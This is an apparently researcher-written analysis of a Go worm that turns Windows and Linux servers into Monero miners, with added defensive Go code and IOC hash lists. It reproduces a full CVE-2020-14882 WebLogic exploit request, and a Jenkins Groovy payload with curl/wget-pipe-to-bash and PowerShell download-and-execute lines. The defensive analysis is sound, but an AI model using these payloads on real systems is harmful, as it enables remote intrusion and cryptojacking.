
Golang worm turns Windows and Linux servers into Monero miners

Introduction

Using the Go language to build multi-platform malware was a clear trend in 2020. In early December 2020, researchers discovered a new worm written in Go. The worm tries to spread across the network and run the XMRig Monero miner at scale. It targets both Windows and Linux servers. An older version of the worm also attempted to exploit the WebLogic vulnerability CVE-2020-14882.

Researchers found that the attackers keep updating the worm on the C2 server, which indicates that the malware developers are active and may add attacks on other weakly configured services in future updates.

Technical analysis

The attacker used 3 files:

· Dropper script (bash or PowerShell);

· Golang worm binary;

· XMRig miner.

These 3 files are all located on the same C2 server.

At the time of analysis, neither the ELF binary nor the bash dropper script was detected by any engine on VirusTotal. Figure 1 shows VirusTotal's result for the ELF worm binary.


Figure 1: VirusTotal’s detection result of ELF binary file

The malware behaves very similarly on Windows and Linux. The following describes the workflow of the Linux worm.

Linux worm workflow

Once executed, the worm checks whether a process is already listening on port 52013 on the infected machine. The port listener serves as a mutex: if the socket is already bound, the new instance exits; otherwise it binds the port itself so that later copies will exit.
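Added Go example (not code from the worm or from the original analysis) showing both sides of that port mutex: the worm-style check that treats a successful bind as "I am the only instance", and a defender-side check that parses /proc/net/tcp to see whether port 52013 is held on a host. The /proc/net/tcp excerpt below is constructed, not captured from an infection.

```go
package main

import (
	"bufio"
	"fmt"
	"net"
	"strconv"
	"strings"
)

// acquirePortMutex mirrors the worm's single-instance check: it binds a
// listener on the mutex port. If the bind fails, another instance already
// holds the port and the caller is expected to exit. The listener must stay
// open for the life of the process; closing it releases the "mutex".
func acquirePortMutex(port int) (net.Listener, error) {
	return net.Listen("tcp", fmt.Sprintf("127.0.0.1:%d", port))
}

// listeningPorts parses the text of /proc/net/tcp (or /proc/net/tcp6) and
// returns the set of local ports in state LISTEN (st column == "0A").
// local_address is "HEXIP:HEXPORT"; the port is the hex after the last colon.
func listeningPorts(procNetTCP string) map[int]bool {
	ports := map[int]bool{}
	sc := bufio.NewScanner(strings.NewReader(procNetTCP))
	for sc.Scan() {
		f := strings.Fields(sc.Text())
		if len(f) < 4 || f[0] == "sl" { // skip the header row and short lines
			continue
		}
		if f[3] != "0A" { // not LISTEN
			continue
		}
		i := strings.LastIndex(f[1], ":")
		if i < 0 {
			continue
		}
		p, err := strconv.ParseUint(f[1][i+1:], 16, 16)
		if err != nil {
			continue
		}
		ports[int(p)] = true
	}
	return ports
}

// hasPortMutex reports whether the worm's mutex port is bound on this host,
// a cheap host-level indicator to pair with the file hashes in the IOC list.
func hasPortMutex(procNetTCP string, port int) bool {
	return listeningPorts(procNetTCP)[port]
}

// wormMutexPort is the port the analysis reports the worm binding as its mutex.
const wormMutexPort = 52013

// sampleProcNetTCP is a constructed /proc/net/tcp excerpt (not a real capture):
// sshd listening on 22 (0x0016), a listener on 52013 (0xCB2D), and one
// established connection (state 01) that must not count as a listener.
const sampleProcNetTCP = `  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 0100007F:CB2D 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 23456 1 0000000000000000 100 0 0 10 0
   2: 0100007F:9C40 0100007F:0016 01 00000000:00000000 00:00000000 00000000  1000        0 34567 1 0000000000000000 20 4 30 10 -1
`

func main() {
	// On a live host read the real table instead: data, _ := os.ReadFile("/proc/net/tcp")
	fmt.Printf("mutex port %d held: %v\n", wormMutexPort, hasPortMutex(sampleProcNetTCP, wormMutexPort))
}
```

Checking the port table is only a hint: the worm can change the port between versions, and any unrelated service could sit on 52013, so treat a hit as a reason to pull the process and compare its hash against the IOC list below.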

In the older version, the worm unpacked an XMRig miner named Network01 into the tmp folder and ran it. The miner was embedded in the Go binary with the Go resource-embedding package go-bindata, and the worm used the generated go-bindata code to extract the embedded XMRig binary. Figure 2 shows the relevant function in the file:


Figure 2: xmrig_linux_amd64.go file
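go-bindata gzip-compresses each embedded asset unless it was run with -nocompress, so an analyst can often recover the bundled miner statically by carving gzip members out of the worm binary instead of running it. The following Go program is an added example (not the worm's or the researchers' code); rather than reading the real sample it builds a constructed stand-in image with a fake ELF payload, and the carving function works the same way on a real file read from disk.

```go
package main

import (
	"bytes"
	"compress/gzip"
	"fmt"
	"io"
)

// gzipMagic is the fixed gzip member header: ID1, ID2, CM=deflate.
var gzipMagic = []byte{0x1f, 0x8b, 0x08}

// carveGzipStreams scans a binary image for gzip member headers and inflates
// each one that decodes cleanly. go-bindata stores embedded assets gzip-
// compressed by default, so a clean inflate recovers the embedded file (here
// the bundled miner) without executing the sample. Byte runs that merely look
// like a header but fail to inflate are skipped.
func carveGzipStreams(image []byte) [][]byte {
	var found [][]byte
	for off := 0; off < len(image); {
		i := bytes.Index(image[off:], gzipMagic)
		if i < 0 {
			break
		}
		start := off + i
		if zr, err := gzip.NewReader(bytes.NewReader(image[start:])); err == nil {
			zr.Multistream(false) // stop at the end of this member, not at EOF of the image
			if data, err := io.ReadAll(zr); err == nil && len(data) > 0 {
				found = append(found, data)
			}
		}
		off = start + 1
	}
	return found
}

// isELF reports whether carved data starts with the ELF magic, i.e. is a
// Linux executable such as the XMRig build the worm drops.
func isELF(data []byte) bool {
	return bytes.HasPrefix(data, []byte{0x7f, 'E', 'L', 'F'})
}

// embeddedPayload is a constructed stand-in for the embedded miner: the ELF
// magic plus a marker string, not a real XMRig binary.
var embeddedPayload = append([]byte{0x7f, 'E', 'L', 'F'}, []byte("constructed xmrig stand-in")...)

// buildSampleImage fakes the layout of a go-bindata-built binary: code before,
// one gzip member holding the asset, code after. Constructed input only.
func buildSampleImage() []byte {
	var buf bytes.Buffer
	buf.WriteString("...loader code... bindataRead ...")
	zw := gzip.NewWriter(&buf)
	zw.Write(embeddedPayload)
	zw.Close()
	buf.WriteString("...trailing code...")
	return buf.Bytes()
}

func main() {
	// On a real sample: image, _ := os.ReadFile("worm.elf"); carveGzipStreams(image)
	for n, asset := range carveGzipStreams(buildSampleImage()) {
		fmt.Printf("asset %d: %d bytes, ELF=%v\n", n, len(asset), isELF(asset))
	}
}
```

A carved ELF can be hashed and compared with the IOC list, or its strings inspected for the XMRig banner and the mining pool, all without giving the sample a chance to run.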

The malware runs a TCP SYN scan of the network to find services it can brute-force and spread through, then targets the IPs that have the relevant ports open: 8080 for Tomcat and Jenkins, 3306 for MySQL and 7001 for WebLogic. The exploit code for these services lives in a package named exp under src.


Figure 3: “exp” package files and functions

The worm uses the gopacket library, which provides Go bindings to libpcap, to read network packets. By running pcapc the worm collects the scan responses and then goes on to brute-force the services it found. Figure 4 shows a fragment of the worm's brute-force results and exploitation attempts against Tomcat and MySQL services.


Figure 4: Fragment of worm results

After successfully exploiting a service, the malware deploys a loader script: ld.sh on Linux and ld.ps1 on Windows. The loader drops and runs the XMRig miner and the Golang worm. Figures 5 and 6 show the loader scripts.


Figure 5: ldr.sh, the dropper bash script for Linux


Figure 6: ldr.ps1, the dropper PowerShell script for Windows

Exploit flow

The attack flow for each service is as follows:

MySQL: Port 3306

The malware runs a credential brute-force attack using a hard-coded dictionary of weak credentials, such as root:123456.

After a successful login, the malware uses the MySQL UDF (user-defined function) mechanism to load its shellcode and run commands on the host. The researchers describe this step as local privilege escalation; note that a UDF executes with the privileges of the mysqld process, so what it actually yields is command execution as the database service account. The exploit is embedded in the binary as a hexadecimal string, with a separate build for each operating system and architecture: UDFLINUX32, UDFLINUX64, UDFLWIN32 and UDFWIN64.

After loading the UDF, the payload calls sys_exec to drop and run the loader script; URLWIN and URLLINUX hold the dropper script URLs. On the defender side, a sys_exec entry in the mysql.func table that nobody installed deliberately is a strong indicator of this technique, and setting secure_file_priv to a directory other than plugin_dir (or to NULL, which disables file import and export entirely) blocks the usual way of writing the UDF library into the plugin directory with SELECT ... INTO DUMPFILE. Figures 7 and 8 show the payloads for each operating system.


Figure 7: MySQL query-Linux payload


Figure 8: MySQL query-Windows payload

Tomcat: Port 8080

The malware performs credential stuffing against the Tomcat Manager (the administrator panel) over HTTP Basic authentication.


Figure 9: Example of authentication request to Tomcat admin panel

After a successful login, the malware deploys a WAR file that delivers 1.jsp, the file carrying the malicious payload.

The malware then sends a GET request to %s/1.jsp?win=%s&linux=%s. The JSP parses these two parameters, which carry the URLs of the Windows and Linux dropper scripts, and drops and runs the loader for its own platform.


Figure 10: 1.jsp file script

Jenkins: Port 8080

Similar to the previous exploit, the malware brute-forces the Jenkins login with credential stuffing and then runs the following payload. The first string is the template that gets base64-encoded; the Groovy one-liner below it reassembles and decodes that string at runtime, splits it on "!" into a Windows half and a Linux half, picks one by checking whether os.name contains "indo" (as in "Windows"), splits the chosen half on "@" into an argument list and executes it:

[email protected]/[email protected] iex(New-Object Net.WebClient).DownloadString(‘%s’)[email protected]@(curl -fsSL %s || wget -q -O – %s) | bash

println "%s"+"%s";def s=new String(Base64.getDecoder().decode("%s"+"%s".reverse())).split("!");def c=System.getProperty("os.name").contains("indo")?s[0].split("@"):s[1].split("@");c.execute()
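To make that encoding concrete, here is an added Go example (not the worm's code and not from the original analysis) that builds and decodes the two-fragment argument the Groovy one-liner consumes: base64 of "win@args!linux@args", split at an arbitrary point, with the second fragment reversed. The command lines are constructed stand-ins rather than the worm's dropper commands; the decoder is the part an analyst would apply to a captured Jenkins script-console request.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"strings"
)

// reverse returns s with its bytes in reverse order. The fragments are ASCII
// base64, so a byte reversal matches Groovy's String.reverse() here.
func reverse(s string) string {
	b := []byte(s)
	for i, j := 0, len(b)-1; i < j; i, j = i+1, j-1 {
		b[i], b[j] = b[j], b[i]
	}
	return string(b)
}

// encodeJenkinsArgs builds the two strings the Groovy script substitutes for
// its "%s" placeholders: argv lists joined with "@", the Windows and Linux
// halves joined with "!", base64-encoded, cut at splitAt, second part reversed.
// Splitting and reversing keeps the base64 of the commands out of a naive grep.
func encodeJenkinsArgs(win, linux []string, splitAt int) (string, string) {
	plain := strings.Join(win, "@") + "!" + strings.Join(linux, "@")
	b64 := base64.StdEncoding.EncodeToString([]byte(plain))
	if splitAt < 0 || splitAt > len(b64) {
		splitAt = len(b64) / 2
	}
	return b64[:splitAt], reverse(b64[splitAt:])
}

// decodeJenkinsArgs undoes what the one-liner does at runtime:
// "%s"+"%s".reverse() -> Base64 decode -> split("!") -> split("@").
// It returns both command lines so an analyst sees what each OS would run.
func decodeJenkinsArgs(first, second string) (win, linux []string, err error) {
	raw, err := base64.StdEncoding.DecodeString(first + reverse(second))
	if err != nil {
		return nil, nil, err
	}
	halves := strings.SplitN(string(raw), "!", 2)
	if len(halves) != 2 {
		return nil, nil, fmt.Errorf("payload lacks the '!' separator")
	}
	return strings.Split(halves[0], "@"), strings.Split(halves[1], "@"), nil
}

// Constructed stand-in commands (not the worm's real dropper commands).
var (
	sampleWin   = []string{"cmd", "/c", "echo windows-branch"}
	sampleLinux = []string{"sh", "-c", "echo linux-branch"}
)

func main() {
	first, second := encodeJenkinsArgs(sampleWin, sampleLinux, 10)
	fmt.Println("fragments:", first, second)
	win, linux, err := decodeJenkinsArgs(first, second)
	fmt.Println("windows:", win, "linux:", linux, "err:", err)
}
```

When hunting in Jenkins logs or proxy captures, the stable part to match on is the Groovy skeleton itself (Base64.getDecoder, .reverse(), split("!"), .execute()), since the two fragments change with every dropper URL.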

WebLogic: Port 7001

In earlier versions the worm exploited CVE-2020-14882, a then-recent WebLogic remote code execution vulnerability. It sends a GET request to the WebLogic console in which the path is double URL-encoded: %25%32%65 decodes to %2e and then to ".", so the request escapes the /console/css/ prefix and reaches consolejndi.portal while looking like a static resource request. The commands to run are carried in the request's own cmd, linux and win headers, which the payload reads with req.getHeader(). The %% sequences in the template below are escaped percent signs from the Go-style format string the worm fills in (the %s and %d placeholders receive the target host and the dropper URLs); they are not part of the wire request.

GET /console/css/%%25%%32%%65%%25%%32%%65%%25%%32%%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession(' weblogic.work.ExecuteThread%%20currentThread=(weblogic.work.ExecuteThread)Thread.currentThread();weblogic.work.WorkAdapter%%20adapter=currentThread.getCurrentWork();java.lang.reflect.Field%%20field=adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object%%20obj=field.get(adapter);weblogic.servlet.internal.ServletRequestImpl%%20req=(weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj);String%%20cmd=req.getHeader("cmd");String[]%%20cmds=System.getProperty("os.name").toLowerCase().contains("win")?new%%20String[]{"cmd.exe","/c",req.getHeader("win")}:new%%20String[]{"/bin/sh","c",req.getHeader("linux")};if(cmd!=null){String%%20result=new%%20java.util.Scanner(new%%20java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("%%5C%%5CA").next();weblogic.servlet.internal.ServletResponseImpl%%20res=(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);work.getServletOutputStream().writeStream(new%%20weblogic.xml.util.StringInputStream(result));work.getServletOutputStream().flush();}currentThread.interrupt();') HTTP/1.0

Host: %s:%d

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:82.0) Gecko/20100101 /82.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Connection: close

cmd: ls

linux: ( (curl -fsSL %s || wget -q -O – %s) | bash& )

win: start powershell iex(New-Object Net.WebClient).DownloadString('%s')
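The Tomcat and WebLogic steps above each leave a distinctive trace in web server access logs. As an added example (not code from the original analysis or from the worm), the following Go program runs the three checks a defender would want over such logs: a WAR deployment through the Tomcat Manager, the call to 1.jsp with the win and linux dropper URLs, and a request under /console/css/ whose path, after being percent-decoded twice and normalised, escapes that prefix and lands on a console portal page. The log lines, the dropper host (dropper.example) and the /x/1.jsp path are constructed placeholders, and the common/combined log format is assumed.

```go
package main

import (
	"fmt"
	"net/url"
	"path"
	"strings"
)

// Finding is one suspicious access-log line with the reason it was flagged.
type Finding struct {
	Line   int
	Reason string
	Detail string
}

// doubleDecodePath percent-decodes a raw request path twice and normalises it,
// which is what the WebLogic console ends up resolving when it is sent
// "%25%32%65" (-> "%2e" -> "."). Decoding is best-effort: a string that is not
// valid percent-encoding is passed through unchanged so it is still inspected.
func doubleDecodePath(p string) string {
	for i := 0; i < 2; i++ {
		if d, err := url.PathUnescape(p); err == nil {
			p = d
		}
	}
	return path.Clean(p)
}

// triageLine inspects one request (method + request-target) for the patterns
// the worm leaves behind. It returns ("", "") for a benign request.
func triageLine(method, target string) (reason, detail string) {
	u, err := url.ParseRequestURI(target)
	if err != nil {
		return "", ""
	}
	q := u.Query()
	switch {
	// Tomcat Manager WAR deployment: text API (PUT) or HTML upload form (POST).
	case method == "PUT" && strings.HasPrefix(u.Path, "/manager/text/deploy"),
		method == "POST" && strings.HasPrefix(u.Path, "/manager/html/upload"):
		return "tomcat-manager-deploy", u.Path
	// The dropped JSP is invoked with the dropper URLs for both platforms.
	case strings.HasSuffix(u.Path, ".jsp") && q.Get("win") != "" && q.Get("linux") != "":
		return "jsp-dropper-call", "win=" + q.Get("win") + " linux=" + q.Get("linux")
	// WebLogic: a request under the static /console/css/ prefix that, once
	// double-decoded, escapes the prefix and reaches a *.portal page.
	case strings.HasPrefix(u.Path, "/console/css/"):
		norm := doubleDecodePath(u.EscapedPath()) // EscapedPath keeps the raw %25.. bytes
		if !strings.HasPrefix(norm, "/console/css/") && strings.HasSuffix(norm, ".portal") {
			return "weblogic-console-traversal", norm
		}
	}
	return "", ""
}

// triageAccessLog runs triageLine over lines in common/combined log format:
// client - user [time] "METHOD target HTTP/x" status bytes ...
func triageAccessLog(logText string) []Finding {
	var out []Finding
	for n, line := range strings.Split(strings.TrimSpace(logText), "\n") {
		start := strings.Index(line, "\"")
		if start < 0 {
			continue
		}
		end := strings.Index(line[start+1:], "\"")
		if end < 0 {
			continue
		}
		req := strings.Fields(line[start+1 : start+1+end])
		if len(req) < 2 {
			continue
		}
		if reason, detail := triageLine(req[0], req[1]); reason != "" {
			out = append(out, Finding{Line: n + 1, Reason: reason, Detail: detail})
		}
	}
	return out
}

// sampleAccessLog is constructed, not a real capture; hosts and paths are
// placeholders. Lines 2-4 are the worm's footprint, lines 1 and 5 are benign.
const sampleAccessLog = `10.0.0.5 - - [01/Jan/2021:10:00:00 +0000] "GET /docs/index.html HTTP/1.1" 200 512
10.0.0.9 - admin [01/Jan/2021:10:00:01 +0000] "PUT /manager/text/deploy?path=/x&update=true HTTP/1.1" 200 71
10.0.0.9 - - [01/Jan/2021:10:00:02 +0000] "GET /x/1.jsp?win=http://dropper.example/ld.ps1&linux=http://dropper.example/ld.sh HTTP/1.1" 200 11
10.0.0.9 - - [01/Jan/2021:10:00:03 +0000] "GET /console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('x') HTTP/1.0" 200 4000
10.0.0.5 - - [01/Jan/2021:10:00:04 +0000] "GET /console/css/login.css HTTP/1.1" 200 900
`

func main() {
	for _, f := range triageAccessLog(sampleAccessLog) {
		fmt.Printf("line %d: %s (%s)\n", f.Line, f.Reason, f.Detail)
	}
}
```

The traversal check deliberately matches on the decoded outcome rather than on the literal "%252e" string, because any mix of single and double encoding (or "%2e" in one segment and "%252e" in the next) resolves to the same path and would evade a literal signature.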

Summary

In 2020, researchers discovered many Golang malware families attacking different platforms, including Windows, Linux, macOS and Android, and they expect this trend to continue in 2021. In this case the PE and ELF versions of the worm share almost identical code.

IOCs

185[.]239[.]242[.]71

MD5

236d7925cfafc1f643babdb8e48966bf
ead2cf8ab7aef63706b40eb57d668d0a
750644690e51db9f695b542b463164b9
f4c90b41126fc17848bd0d131288bd36
d8499b7b2e2aeb76387668306e982673
301a0a58dd98ecbbe12c6acbd0c7bbdc
f5859e81ff49dd66e501ec7c0f39c83e
9c2aa65235a939b2811f281a45ecdab0
078b2a96f45b493e82b44f8c5344e7e5
d708a5394e9448ab38201264df423c0a
030231d96234f06ae09ca18d621241e5
14f57bd246cc1db3131cab421fbc8dac
642d73c85e6e79720a5ae7b82fc427c5
b1a4ec25e168156aeee8184b05777b1b
97d89d25e9589f995d374cb7d89b4433
569fcf95f3889cefd87c1b425fa37b03

SHA1

5ff84493d7143b482c422e741a4098f1e5c68149
0630097e2962e26e37600ce16fb78821625de6d0
8ed923a83924680858d6518433adf36988991868
a428261aae2ec2821f21411dee4d8c16a70e66fd
edd743e4ba3fca72494879e571e596584fe37a85
18e9e02294d598a68f94de1333f6b31291b81bcf
cf69d3be6f01ba5d3ec29a9fb50b58b5aaea9aca
88a9656cf712bed892bd41a57b71b695e38b2b1a
175e50785a8ec6ba84894d973f4b321040ccc301
16403ee190cc1799d4400cd5daee0b6b8b0110ac
83609ca595a9a675f0dbbf147e7cb7a9e022d659
3d2a9819c6f2a39ad0b0a3a82c8ad7f8a5ee4883
c0f12971eeff4f7ea5c8deb733a8eb0565e92cfd
f991fcd63b66f28acec406119dd7af2638bf6a35
3ce0ba5a07767b4c1bfded6d6ee80457dd447074
74948333fd5cced7e04dc67e68096b64371602a9

SHA256

3298dbd985c341d57e3219e80839ec5028585d0b0a737c994363443f4439d7a5
1a63f7a38c7f5a5cc770246c958aea70ea95bcafac1bad92d2d524f4fe24c1ca
62ba664a95b3ca00e7a71fe6aa4a979c5a50f16a62cf72830af13bec7edb1da4
67f03f3065ec012cd8853e9d1b11cb441741910a24cb23ea652fb63d7219ebaa
18bc08cccf7ba713c7cc734547dca9776fcee9459c0b4e9549bb8b9923d21732
720341984c842070dcc925cb47127aba35e16971cf7d532cc2efb24b98d56c93
7e765c12a391308879f1e6b57bf6ae87c0fd0e8d6e0207954cc3a41fd387fda9
2ca7ac7c1884004ea3ce310e2ed8bc23ecb0e26826aff48e4662809cc4299350
d1e4fb661716aa79351fdb86c6a364a4a52a86d85ecf91afff052abdfc168b5b
934b422f0b8d26bd1c094bd532ddd947a702262c27991d757a9a6e3672014e98
15e0b4302902a425dcd0476a60a0d96a17c5a6cdd9fe13c2d09c5055e48178e4
96a1312edf9d69a6bf54555f7d015e7e580f7b7576d400e581498319ee644063
24a84889f53b65b6738dd0194ff6d15f6ae227e37a91a4589ba51ce1f019a4f8
2ed8a73945ec6e9ed23714016c20db934740e0904eac2b0dc5a0d44b3498f97d
b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09
bac8a452547ae6690c56c2fc5274d55d13e8c063e615f2f964cc8413ba5c640c